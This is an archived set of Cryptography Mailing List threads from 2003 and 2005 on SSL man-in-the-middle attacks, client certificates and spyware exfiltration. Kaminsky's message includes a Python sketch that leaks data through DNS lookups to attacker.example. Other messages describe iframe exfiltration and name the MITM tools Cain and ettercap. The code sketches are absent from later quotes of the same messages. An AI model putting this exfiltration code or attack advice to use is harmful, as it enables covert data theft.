Re: WYTM - but what if it was true?

2005-06-27 Thread Dan Kaminsky

If you are insisting that there is always
a way and that, therefore, the situation is
permanently hopeless such that the smart
ones are getting the hell out of the
Internet, I can go with that, but then
we (you and I) would both be guilty of
letting the best be the enemy of the good.
  

A reasonable critique.

It is not necessary, though, that an acceptable solution keep PCs with
persistent stores secure.  A bootable CD from a bank is an unexpectedly
compelling option, as are the sorts of services we're going to see
coming out of all those new net-connected gaming systems arriving soon.

--Dan


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-27 Thread John Denker

On 06/27/05 00:28, Dan Kaminsky wrote:


... that an acceptable solution keep PCs with persistent stores
secure.  A bootable CD from a bank is an unexpectedly compelling option


Even more compelling is:
 -- obtain laptop hardware from a trusted source
 -- obtain software from a trusted source
 -- throw the entire laptop into a GSA-approved safe when
  not being used.

This is a widely-used procedure for dealing with classified
data.


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-27 Thread Chris Kuethe
On 6/26/05, Dan Kaminsky [EMAIL PROTECTED] wrote:
 It is not necessary though that there exists an acceptable solution that
 keeps PC's with persistent stores secure.  A bootable CD from a bank is
 an unexpectedly compelling option, as are the sort of services we're
 going to see coming out of all those new net-connected gaming systems
 coming out soon.

You just know that people won't want to totally reboot their machines
every time they want to bank, because that'll break their
excel+quicken+msmoney integrated finances. So they'll try to make a
bootable HD partition, or run it under vmware, or copy the trusted
client off. These, of course, cannot be allowed by the banks if they
want to preserve the illusion of their secure banking app...

And now we have a market for cracked trusted banking clients, both
for phishers and lazy people... it's game copy protection wars all
over again. :)

-- 
GDB has a 'break' feature; why doesn't it have 'fix' too?

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-24 Thread dan

What do you tell people to do?

<commercial_message>

Defense in depth, as always.  As an officer at
Verdasys, data-offload is something we block
by simply installing rules like "Only these
two trusted applications can initiate outbound
HTTP," where the word "trusted" means checksummed
and the choice of HTTP represents the most common
mechanism for spyware, say, to do the offload
of purloined information.  Put differently,
if there are 5,000 diseases but only two symptoms,
then symptomatic relief is a more cost-effective
approach than cure.  In this case, why do
I care if I have spyware if it can't talk to its
distant master?  (Why do I care if I have a tumor
if angiostatin keeps it forever smaller than 1mm
in diameter?)  Of course, there are details, and,
of course, I am willing to discuss them at far
greater length.

</commercial_message>
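
A minimal sketch of what such a rule can look like, in Python, assuming a
hypothetical policy hook that is consulted before an application is allowed
to open an outbound HTTP connection; the paths and digests below are
placeholders, and a real product would enforce this in the kernel or network
stack rather than in a script:

import hashlib

# Hypothetical whitelist: SHA-256 digests of the only two application
# binaries permitted to initiate outbound HTTP (placeholder values).
TRUSTED_HTTP_CLIENTS = {
    "3f8a...placeholder...": "C:/Program Files/Internet Explorer/iexplore.exe",
    "9bc1...placeholder...": "C:/Program Files/Mail Client/mail.exe",
}

def sha256_of(path):
    # "Trusted" here means nothing more than "matches a known checksum".
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def may_initiate_outbound_http(binary_path):
    # The policy hook: allow the connection only if the requesting
    # binary's checksum is on the whitelist.
    try:
        return sha256_of(binary_path) in TRUSTED_HTTP_CLIENTS
    except OSError:
        return False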


--dan


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-24 Thread Dan Kaminsky
Dan--

I had something much more complicated, but it comes down to this:

You trust Internet Explorer.
Spyware considers Internet Explorer crunchy, and good with ketchup.
Any questions?

A little less snarkily, spyware can trivially use what MS refers to
as a Browser Helper Object (BHO) to alter all traffic on any web page.
Inserting a 1x1 iframe in the corner of whatever page, one that does
nothing but transmit data upstream via HTTP image GETs, is trivial.
And if HTTP is a bit too protected -- there's *always* DNS ;).
gethostbyname indeed.
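
To make the DNS aside concrete, here is a minimal Python sketch of the
covert channel being alluded to; attacker.example is a placeholder zone,
and the payload is assumed to be small enough to fit in a single DNS label:

import base64
import socket

def leak_via_dns(data, zone="attacker.example"):
    # Encode a small payload (at most ~35 bytes, so the base32 form fits
    # in one 63-character label) into a hostname and resolve it.  The
    # lookup itself carries the data to whoever runs the zone's
    # authoritative nameserver; no HTTP connection is ever made.
    label = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    try:
        socket.gethostbyname(label + "." + zone)
    except socket.gaierror:
        pass  # resolution failure is irrelevant; the query already left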

--Dan

P.S.  Imagine for a moment it was profitable to give people cancer.  No,
not just a pesky side effect, but kind of the idea.  Angiostatin
wouldn't stand a chance.

[EMAIL PROTECTED] wrote:

What do you tell people to do?

<commercial_message>

Defense in depth, as always.  As an officer at
Verdasys, data-offload is something we block
by simply installing rules like "Only these
two trusted applications can initiate outbound
HTTP," where the word "trusted" means checksummed
and the choice of HTTP represents the most common
mechanism for spyware, say, to do the offload
of purloined information.  Put differently,
if there are 5,000 diseases but only two symptoms,
then symptomatic relief is a more cost-effective
approach than cure.  In this case, why do
I care if I have spyware if it can't talk to its
distant master?  (Why do I care if I have a tumor
if angiostatin keeps it forever smaller than 1mm
in diameter?)  Of course, there are details, and,
of course, I am willing to discuss them at far
greater length.

</commercial_message>


--dan


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
  



-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-24 Thread dan

Dan Kaminsky writes:
 | Dan--
 |
 | I had something much more complicated, but it comes down to.
 |
 | You trust Internet Explorer.
 | Spyware considers Internet Explorer crunchy, and good with ketchup.
 | Any questions?
 |
 | A little less snarkily, Spyware can trivially use what MS refers to
 | as a Browser Helper Object (BHO) to alter all traffic on any web page.
 | Inserting a 1x1 iframe in the corner of whatever, that does nothing but
 | transmit upstream data via HTTP image GETs, is trivial.  And if HTTP is
 | a bit too protected -- there's *always* DNS ;).  gethostbyname indeed.
 |
 | P.S.  Imagine for a moment it was profitable to give people cancer.  No,
 | not just a pesky side effect, but kind of the idea.  Angiostatin
 | wouldn't stand a chance.
 |


If you are insisting that there is always
a way and that, therefore, the situation is
permanently hopeless such that the smart
ones are getting the hell out of the
Internet, I can go with that, but then
we (you and I) would both be guilty of
letting the best be the enemy of the good.

<commercial>

  However, I/we routinely disable all use of
  BHOs, prevent modification of any entity as chosen
  by filename extension, checksum, or filesystem
  location, and whitelist applications, to name
  a _few_.  For the genuinely paranoid, regular
  (like every few hours) reboot to a new VM is
  also enforceable and recommended, especially
  if you care about attacks that are purely
  in-memory and which do not leave behind any
  payload to aid an attacker on his/her
  proposed second visit.  If you indeed are an
  "I don't need no stinkin' payload" sort of
  guy, like the folks who eschew carrying matches
  because you can always light a fire by rubbing
  two sticks together, make me a suggestion;
  I love free consulting.

</commercial>

--dan


=
Internet Explorer is the most dangerous program ever written.
  -- Rik Farrow to Scott Charney during the audience grilling stage of 
 http://www.usenix.org/events/usenix04/tech/sigs.html#mono_debate



-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


WYTM - but what if it was true?

2005-06-22 Thread Ian Grigg
A highly aspirated but otherwise normal watcher of black helicopters asked:

 Any idea if this is true?
  (WockerWocker, Wed Jun 22 12:07:31 2005)
 http://c0x2.de/lol/lol.html

Beats me.  But what if it was true?  What's your advice to
clients?

iang
-- 
Advances in Financial Cryptography, Issue 1:
   https://www.financialcryptography.com/mt/archives/000458.html
Daniel Nagy, On Secure Knowledge-Based Authentication
Adam Shostack, Avoiding Liability: An Alternative Route to More Secure Products
Ian Grigg, Pareto-Secure

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM - but what if it was true?

2005-06-22 Thread Ben Laurie

Allan Liska wrote:

3. Use an on-screen keyboard.


For extra points, try Dasher.

http://www.inference.phy.cam.ac.uk/dasher/

--
ApacheCon Europe   http://www.apachecon.com/

http://www.apache-ssl.org/ben.html   http://www.thebunker.net/

There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit. - Robert Woodruff

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread Ian Grigg
Tom Weinstein wrote:

 The economic view might be a reasonable view for an end-user to take,
 but it's not a good one for a protocol designer. The protocol designer
 doesn't have an economic model for how end-users will end up using the
 protocol, and it's dangerous to assume one. This is especially true for
 a protocol like TLS that is intended to be used as a general solution
 for a wide range of applications.


I agree with this.  Especially, I think we are
all coming to the view that TLS/SSL is in fact
a general purpose channel security protocol,
and should not be viewed as being designed to
protect credit cards or e-commerce especially.

Given this, it is unreasonable to talk about
threat models at all, when discussing just the
protocol.  I'm coming to the view that protocols
don't have threat models, they only have
characteristics.  They meet requirements, and
they get deployed according to the demands of
higher layers.

Applications have threat models, and herein lies
the mistake that was made with the ITM.
Each application has to develop its own threat
model, and from there, its security model.

Once so developed, a set of requirements can
be passed on to the protocol.  Does SSL/TLS
meet the requirements passed on from on high?
That of course depends on the application and
what requirements are set.

So, yes, it is not really fair for a protocol
designer to have to undertake an economic
analysis, just as they don't get involved
in threat models and security models.  It's
up to the application team to do that.

Where we get into trouble a lot in the crypto
world is that crypto has an exaggerated
importance, an almost magical property of
appearing to make everything safe.  Designers
expect a lot from cryptographers for these
reasons.  Too much, really.  Managers demand
some special sprinkling of crypto fairy dust
because it seems to make the brochure look
good.

This will always be a problem.  Which is why
it's important for the crypto guy to ask the
question - what's *your* threat model?  Stick
to his scientific guns, as it were.


 In some ways, I think this is something that all standards face. For any
 particular application, the standard might be less cost effective than a
 custom solution. But it's much cheaper to design something once that
 works for everyone off the shelf than it would be to custom design a new
 one each and every time.


Right.  It is however the case that secure
browsing is facing a bit of a crisis in
security.  So, there may have to be some
changes, one way or another.

iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread Peter Gutmann
Perry E. Metzger [EMAIL PROTECTED] writes:

TLS is just a pretty straightforward well analyzed protocol for protecting a
channel -- full stop. It can be used in a wide variety of ways, for a wide
variety of apps. It happens to allow you to use X.509 certs, but if you
really hate X.509, define an extension to use SPKI or SSH style certs. TLS
will accommodate such a thing easily. Indeed, I would encourage you to do
such a thing.

Actually there's no need to even extend TLS, there's a standard and very
simple technique which is probably best-known from its use in SSH but has been
in use in various other places as well:

1. The first time your server fires up, generate a self-signed cert.

2. When the user connects, have them verify the cert out-of-band via its
   fingerprint.  Even a lower-security simple phrase or something derived from
   the fingerprint is better than nothing.

3. For subsequent connections, warn if the cert fingerprint has changed.

That's currently being used by a number of TLS-using apps, and works at least
as well as any other mechanism.  At a pinch, you can even omit (2) and just
warn if a key that doesn't match the one first encountered is used; that'll
catch everything but an extremely consistent MITM.  Using something like SSH
keys isn't going to give you any magical security that X.509 certs don't,
you'll just get something equivalent to the above mechanism.
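
As a rough illustration (not anything a particular product ships), the whole
scheme fits in a few lines of Python; the pin store here is just a
dictionary, and in step (2) the fingerprint would be confirmed out-of-band
before being trusted:

import hashlib
import socket
import ssl

def server_cert_fingerprint(host, port=443):
    # Fetch the server certificate without chain validation (self-signed
    # certs are expected) and return its SHA-256 fingerprint -- the value
    # the user would verify out-of-band.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
    return hashlib.sha256(der).hexdigest()

def check_continuity(host, known_pins):
    # SSH-style key continuity: remember the fingerprint the first time,
    # warn loudly if it ever changes.
    fp = server_cert_fingerprint(host)
    if host not in known_pins:
        known_pins[host] = fp      # step 2: confirm out-of-band here
        return True
    if known_pins[host] != fp:
        print("WARNING: certificate for %s has changed!" % host)
        return False
    return True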

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread Anton Stiglic

- Original Message - 
From: Tom Otvos [EMAIL PROTECTED]

 As far as I can glean, the general consensus in WYTM is that MITM attacks
are very low (read:
 inconsequential) probability.

I'm not certain this was the consensus.

We should look at the scenarios in which this is possible, and the tools that
are available to accomplish the attack.  I would say that the attack is more
easily done inside a local network (outside the network you have to get
control of the ISP or some node, and this is more for the elite).
But statistics show that most exploits are accomplished by employees
within a company (either because they are not aware of basic security
principles, or because the malicious person was an insider), so I find this
scenario (attack from inside the network) to be plausible.

Take for example a large corporation of 100 or more employees: there have
got to be a couple of people who do on-line purchasing from work, on-line
banking, etc.  I would say that it is possible that an employee (just
curious, or really malicious) would want to intercept these communications.

So how difficult is it to launch an MITM attack on https?  Very simple it
seems.  My hacker friends pointed out two tools to me, ettercap and Cain:
http://ettercap.sourceforge.net/
http://www.oxid.it/cain.html

Cain is the newest I think, and remarkably simple to use.  It has a very nice
GUI and it doesn't take much hacking ability to use it.  I've been using it
recently for educational purposes and find it very easy to use, and I don't
consider myself a hacker.

Cain allows you to do MITM (in HTTPS, DNS and SSHv1) on a local
network.  It can generate certificates in real time with the same common
name as the original.  The only thing is that the certificate will probably
not be signed by a trusted CA, but most users are not security aware and
will just continue despite the warning.

So given this information, I think MITM threats are real.  Are these attacks
being done in practice?  I don't know, but I don't think they would easily
be reported if they were, so you  can guess what my conclusion is...

--Anton



-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread Anne Lynn Wheeler
Internet group starts anti-hacker initiative
http://www.computerweekly.com/articles/article.asp?liArticleID=125823&liArticleTypeID=1&liCategoryID=2&liChannelID=22&liFlavourID=1&sSearch=&nPage=1

one of the threats discussed in the above is the domain name ip-address 
take-over mentioned previously
http://www.garlic.com/~lynn/aadsm15.htm#28

which was one of the primary justifications supposedly for SSL deployment 
(am i really talking to the server that I think i'm talking to).
--
Anne & Lynn Wheeler   http://www.garlic.com/~lynn/
Internet trivia 20th anv http://www.garlic.com/~lynn/rfcietff.htm
 

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread David Honig
At 07:11 PM 10/22/03 -0400, Perry E. Metzger wrote:

Indeed. Imagine if we waited until airplanes exploded regularly to
design them so they would not explode, or if we had designed our first
suspension bridges by putting up some randomly selected amount of
cabling and seeing if the bridge collapsed. That's not how good
engineering works.

No.  But how quickly we forget how many planes *did* break up,
how many bridges *did* fall apart, because engineering sometimes
goes into new territory.

Even now.  You start using new composite materials in planes, and wonder why
they fall out of the sky when their tails snap off.  
Eventually (though not yet) Airbus et al
will get a clue how they fail differently from familiar metals.  
Even learning about now-mundane metal fatigue in planes involved
breakups and death.

(Safety) engineering *is* (unfortunately, but perhaps by practical necessity)
somewhat reactive.  It tries very hard not to be, but it is.

dh





-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-11-12 Thread Anton Stiglic
 I'm not sure how you come to that conclusion.  Simply
 use TLS with self-signed certs.  Save the cost of the
 cert, and save the cost of the re-evaluation.
 
 If we could do that on a widespread basis, then it
 would be worth going to the next step, which is caching
 the self-signed certs, and we'd get our MITM protection
 back!  Albeit with a bootstrap weakness, but at real
 zero cost.

I know of some environments where this is done.  For example
to protect the connection to a corporate mail server, so that 
employees can read their mail from outside of work.  The caching 
problem is easily solved in this case by having the administrator 
distribute the self-signed cert to all employees and having them 
import it and trust it.  This costs no more than 1 man day per year.

This is near 0 cost however, and gives some weight to Perry's
argument.

 Any merchant who wants more, well, there *will* be
 ten offers in his mailbox to upgrade the self-signed
 cert to a better one.  Vendors of certs may not be
 the smartest cookies in the jar, but they aren't so
 dumb that they'll miss the financial benefit of self-
 signed certs once it's been explained to them.

I have a hard time believing that a merchant (who plans
to make $ by providing the possibility to purchase on-line)
cannot spend something like 1000$ [1] a year for an SSL 
certificate, and that the administrator is not capable of 
properly installing it within 1-2 man days.  If he can't install
it, just get a consultant to do it, you can probably get one
that does it within a day and charges no more than 1000$.

So that would make the total around 2000$ a year; let's
generously round it up to 10K$ per annum.
I think your 10-100 million $ per annum estimate is a bit
exaggerated...


[1] this is the price I saw at Verisign
http://www.verisign.com/products/site/commerce/index.html
I'm sure you can get it for cheaper. This was already 
discussed on this list I think...

--Anton

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-23 Thread David Wagner
Thor Lancelot Simon  wrote:
Can you please posit an *exact* situation in which a man-in-the-middle
could steal the client's credit card number even in the presence of a
valid server certificate?

Sure.  If I can assume you're talking about SSL/https as it is
typically used in ecommerce today, that's easy.  Subvert DNS to
redirect the user to a site under control of the attacker.
Then it doesn't matter whether the legitimate site has a valid server
cert or not.  Is this the kind of scenario you were looking for?

http://lists.insecure.org/lists/bugtraq/1999/Nov/0202.html

Can you please explain *exactly* how using a
client-side certificate rather than some other form of client authentication
would prevent this?

Gonna make me work harder on this one, eh?  Well, ok, I'll give it a try.
Here's one possible way that you might be able to use client certs to
help (assuming client certs were usable and well-supported by browsers).
Beware: I'm making this one up as I go, so it's entirely possible there
are security flaws with my proposal; I'd welcome feedback.

When I establish a credit card with Visa, I generate a new client
certificate for this purpose and register it with www.visa.com.  When I
want to buy a fancy hat from www.amazon.com, Amazon re-directs me to
  https://ssl.visa.com/buy.cgi?payto=amazon&amount=$29.99&item=hat
My web browser opens a SSL channel to Visa's web server, authenticating my
presence using my client cert.  Visa presents me a description of the item
Amazon claims I want to buy, and asks me to confirm the request over that
authenticated channel.  If I confirm it, Visa forwards payment to Amazon
and debits my account.  Visa can tell whose account to debit by looking
at the mapping between my client certs and account numbers.  If Amazon
wants to coordinate, it can establish a separate secure channel with Visa.
(Key management for vendors is probably easier than for customers.)

I can't see any MITM attacks against this protocol.  The crucial point is
that Visa will only initiate payment if it receives confirmation from me,
over a channel where Visa has authenticated that I'm on the other end,
to do so.  A masquerading server doesn't learn any secrets that it can
use to authorize bogus transactions.

Does this work?
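
For what it's worth, the Visa-side decision logic seems simple enough to
sketch in Python; everything below (the registry, the settlement calls, the
confirmation callback) is hypothetical and only meant to show that
authorization depends on confirmation received over the
client-cert-authenticated channel:

# Hypothetical registry mapping client-certificate fingerprints to accounts.
CERT_TO_ACCOUNT = {"ab12cd34ef...": "4111-xxxx-xxxx-1234"}

def debit(account, amount):
    print("debit %s from %s" % (amount, account))       # placeholder settlement

def credit_merchant(merchant, amount):
    print("credit %s to %s" % (amount, merchant))       # placeholder settlement

def handle_buy_request(client_cert_fp, payto, amount, item, user_confirms):
    # Act only on confirmation received from the customer over the channel
    # authenticated by their client cert.  A masquerading merchant learns
    # no secret it can replay to authorize other transactions.
    account = CERT_TO_ACCOUNT.get(client_cert_fp)
    if account is None:
        return False                       # unknown client certificate
    if not user_confirms("Pay %s to %s for %s?" % (amount, payto, item)):
        return False                       # customer did not confirm
    debit(account, amount)
    credit_merchant(payto, amount)
    return True

# e.g. handle_buy_request("ab12cd34ef...", "amazon", "$29.99", "hat",
#                         user_confirms=lambda prompt: True)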

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Tom Otvos
I read the WYTM thread with great interest because it dovetailed nicely
with some research I am currently involved in.  But I would like to branch
this topic onto something specific, to see what everyone here thinks.

As far as I can glean, the general consensus in WYTM is that MITM attacks
are very low (read: inconsequential) probability.  Is this *really* true?
I came across this paper last year, at the SANS reading room:

http://rr.sans.org/threats/man_in_the_middle.php

I found it both fascinating and disturbing, and I have since confirmed much
of what it was describing.  This leads me to think that an MITM attack is
not merely of academic interest but one that can occur in practice.  With
sufficiently simplified tools, this type of attack can readily be launched
by script kiddies or someone only just slightly higher on the hacker
evolutionary scale.

Having said that, I would like to suggest that one of the really big flaws
in the way SSL is used for HTTP is that the server rarely, if ever, requires
client certs.  We all seem to agree that convincing server certs can be
crafted with ease, so that a significant portion of the Web population can
be fooled into communicating with a MITM, especially when one takes into
account Bruce Schneier's observations of legitimate uses of server certs
(as quoted by Bryce O'Whielacronx).  But as long as servers do *no*
authentication on client certs (to the point of not even asking for them),
then the essential handshaking built into SSL is wasted.

I can think of numerous online examples where requiring client certs would
be a good thing: online banking and stock trading are two examples that
immediately leap to mind.  So the question is, why are client certs not
more prevalent?  Is it simply an ease-of-use thing?  Since the Internet
threat model upon which SSL is based makes the assumption that the channel
is *not* secure, why is MITM not taken more seriously?  Why, if SSL is
designed to solve a problem that can be solved, namely securing the channel
(and people are content with just that), are not more people jumping up and
down yelling that it is being used incorrectly?

Am I missing something obvious here?  I look forward to any comments you
might have.

-- Tom Otvos

Don't think you are. Know you are. - Morpheus


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Ian Grigg
Tom Otvos wrote:

 As far as I can glean, the general consensus in WYTM is that MITM attacks are very 
 low (read:
 inconsequential) probability.  Is this *really* true?


The frequency of MITM attacks is very low, in the sense
that there are few or no reported occurrences.  This
makes it a challenge to respond to in any measured way.


 I came across this paper last year, at the
 SANS reading room:
 
 http://rr.sans.org/threats/man_in_the_middle.php
 
 I found it both fascinating and disturbing, and I have since confirmed much of what 
 it was
 describing.  This leads me to think that an MITM attack is not merely of academic 
 interest but one
 that can occur in practice.


Nobody doubts that it can occur, and that it *can*
occur in practice.  It is whether it *does* occur
that is where the problem lies.

The question is one of costs and benefits - how much
should we spend to defend against this attack?  How
much do we save if we do defend?

[ Mind you, the issues that are raised by the paper
are to do with MITM attacks, when SSL/TLS is employed
in an anti-MITM role.  (I only skimmed it briefly I
could be wrong.)  We in the SSL/TLS/secure browsing
debate have always assumed that SSL/TLS when fully
employed covers that attack - although it's not the
first time I've seen evidence that the assumption
is unwarranted. ]


 Having said that then, I would like to suggest that one of the really big flaws in 
 the way SSL is
 used for HTTP is that the server rarely, if ever, requires client certs.  We all 
 seem to agree that
 convincing server certs can be crafted with ease so that a significant portion of 
 the Web population
 can be fooled into communicating with a MITM, especially when one takes into account 
 Bruce
 Schneier's observations of legitimate uses of server certs (as quoted by Bryce 
 O'Whielacronx).  But
 as long as servers do *no* authentication on client certs (to the point of not even 
 asking for
 them), then the essential handshaking built into SSL is wasted.
 
 I can think of numerous online examples where requiring client certs would be a good 
 thing: online
 banking and stock trading are two examples that immediately leap to mind.  So the 
 question is, why
 are client certs not more prevalent?  Is is simply an ease of use thing?


I think the failure of client certs has the same
root cause as the failure of SSL/TLS to branch
beyond its mandated role of protecting e-
commerce.  Literally, the requirement that
the cert be supplied (signed) by a third party
killed it dead.  If there had been a button on
every browser that said "generate self-signed
client cert now" then the whole world would be
using them.

Mind you, the whole client cert thing was a bit
of an afterthought, wasn't it?  The orientation
that it was at server discretion also didn't help.


 Since the Internet threat
 model upon which SSL is based makes the assumption that the channel is *not* 
 secure, why is MITM
 not taken more seriously?


People often say that there are no successful MITM
attacks because of the presence of SSL/TLS !

The existence of the bugs in Microsoft browsers
puts the lie to this - literally, nobody has bothered
with MITM attacks, simply because they are way way
down on the average crook's list of sensible things
to do.

Hence, that rant was in part intended to separate
out 1994's view of threat models to today's view
of threat models.  MITM is simply not anywhere in
sight - but a whole heap of other stuff is!

So, why bother with something that isn't a threat?
Why can't we spend more time on something that *is*
a threat, one that occurs daily, even hourly, some
times?


 Why, if SSL is designed to solve a problem that can be solved, namely
 securing the channel (and people are content with just that), are not more people 
 jumping up and
 down yelling that it is being used incorrectly?


Because it's not necessary.  Nobody loses anything
much over the wire, that we know of.  There are
isolated cases of MITMs in other areas, and in
hacker conferences for example.  But, if 10 bit
crypto and ADH was used all the time, it would
still be the least of all risks.


iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Tom Otvos

 So what purpose would client certificates address? Almost all of the use
 of SSL domain name certs is to hide a credit card number when a consumer
 is buying something. There is no requirement for the merchant to
 identify and/or authenticate the client  the payment infrastructure
 authenticates the financial transaction and the server is concerned
 primarily with getting paid (which comes from the financial institution)
 not who the client is.


The CC number is clearly not hidden if there is a MITM.  I think the "I got
my money, so who cares where it came from" argument is not entirely a fair
representation.  Someone ends up paying for abuses, even if it is us in CC
fees, otherwise why bother encrypting at all?  But that is beside the point.

 So, there are some infrastructures that have web servers that want to
 authenticate clients (for instance online banking). They currently
 establish the SSL session and then authenticate the user with
 userid/password against an online database.


These are, I think, more important examples and again, if there is a MITM,
then doing additional authentication post-channel setup is irrelevant.  These
can be easily replayed after the attack has completed.  The authentication
*should* be deeply tied to channel setup, should it not?  Or stated another
way, having chained authentication where the first link in the chain is
demonstrably weak doesn't seem to achieve an awful lot.


 There was an instance of a bank issuing client certificates for use in
 online banking. At one time they claimed to have the largest issued PKI
 client certificates (aka real PKI as opposed to manufactured
 certificates).

 However, they discovered

 1) the certificates had to be reduced back to relying-party-only
 certificates with nothing but an account number (because of numerous
 privacy and liability concerns)

 2) the certificates quickly became stale

 3) they had to look up the account and went ahead and did a separate
 password authentication  in part because the certificates were
 stale.

 They somewhat concluded that the majority of client certificate
 authentication aren't being done because they want the certificates 
 it is because the available COTS software implements it that way (if you
 want to use public key) ... but not because certificates are in anyway
 useful to them (in fact, it turns out that the certificates are
 redundant and superfluous ... and because of the staleness issue
 resulted in them also requiring passwords).


Fascinating!  Can you please tell me what bank that was?

-- tomo

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread John S. Denker
On 10/22/2003 04:33 PM, Ian Grigg wrote:

 The frequency of MITM attacks is very low, in the sense that there
 are few or no reported occurrences.
We have a disagreement about the facts on this point.
See below for details.
 This makes it a challenge to
 respond to in any measured way.
We have a disagreement about the philosophy of how to
measure things.  One should not design a bridge according
to a simple measurement of the amount of cross-river
traffic in the absence of a bridge.  One should not approve
a launch based on the observed fact that previous instances
of O-ring failures were non-fatal.
Designers in general, and cryptographers in particular,
ought to be proactive.
But this philosophy discussion is a digression, because
we have immediate practical issues to deal with.
 Nobody doubts that it can occur, and that it *can* occur in practice.
 It is whether it *does* occur that is where the problem lies.
According to the definitions I find useful, MITM is
basically a double impersonation.  For example,
Mallory impersonates PayPal so as to get me to
divulge my credit-card details, and then impersonates
me so as to induce my bank to give him my money.
This threat is entirely within my threat model.  There
is nothing hypothetical about this threat.  I get 211,000
hits from
  http://www.google.com/search?q=ID-theft
SSL is distinctly less than 100% effective at defending
against this threat.  It is one finger in a dike with
multiple leaks.  Client certs arguably provide one
additional finger ... but still multiple leaks remain.
==

The expert reader may have noticed that there are
other elements to the threat scenario I outlined.
For instance, I interact with Mallory for one seemingly
trivial transaction, and then he turns around and
engages in numerous and/or large-scale transactions.
But this just means we have more than one problem.
A good system would be robust against all forms
of impersonation (including MITM) *and* would be
robust against replays *and* would ensure that
trivial things and large-scale things could not
easily be confused.  Et cetera.
-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Anne Lynn Wheeler
At 05:08 PM 10/22/2003 -0400, Tom Otvos wrote:

The CC number is clearly not hidden if there is a MITM.  I think the I 
got my money so who cares
where it came from argument is not entirely a fair 
representation.  Someone ends up paying for
abuses, even if it is us in CC fees, otherwise why bother encrypting at 
all?  But that is besides
the point.
the statement was that the SSL domain name certificate provides:

1) am i really talking to who I think I'm talking to
2) encrypted channel
obviously #1 addresses MITM (am i really talking to who I think I'm talking 
to).

The issue for the CC is that it really is a shared secret and is extremely
vulnerable ... as I've commented before:

1) CC needs to be in the clear in a dozen or so business processes
2) it is much simpler to harvest a whole merchant file with possibly millions
of CC numbers than to eavesdrop one off the net (even if there was no SSL);
return on investment: for approx. the same amount of effort, get one CC
number or get millions
3) all the instances in the press are in fact involved with harvesting 
large files of numbers ... not one or two at a time off the wire
4) burying the earth in miles of crypto still wouldn't eliminate the 
current shared-secret CC problem

slightly related  security proportional to risk:
http://www.garlic.com/~lynn/2001h.html#61
so the requirement given the X9 financial standards working group X9A10
http://www.x9.org/
was to preserve the integrity of the financial infrastructure for all 
electronic retail payment (regardless of kind, origin, method, etc). The 
result was X9.59 standard
http://www.garlic.com/~lynn/index.html#x959

which effectively defines a digitally signed, authenticated transaction
... no certificate required ... and the CC number used in X9.59
authenticated transactions shouldn't be used in non-authenticated
transactions. Since transactions are now digitally signed and the CC#
can't be used in non-authenticated transactions ... you can
listen in on X9.59 transactions and harvest all the CC# that you want
and it doesn't help with doing fraudulent transactions. In effect, X9.59
changes the business rules so that CC# no longer need to be treated as
shared secrets.
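
A toy illustration of the certificate-less idea (not the actual X9.59
message format), assuming the third-party Python "cryptography" package for
the signature primitives; the account holder registers a public key with the
bank, and the bank honours only transactions signed with that key:

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Registered at account-opening time: account number -> public key.
# No certificate is involved anywhere.
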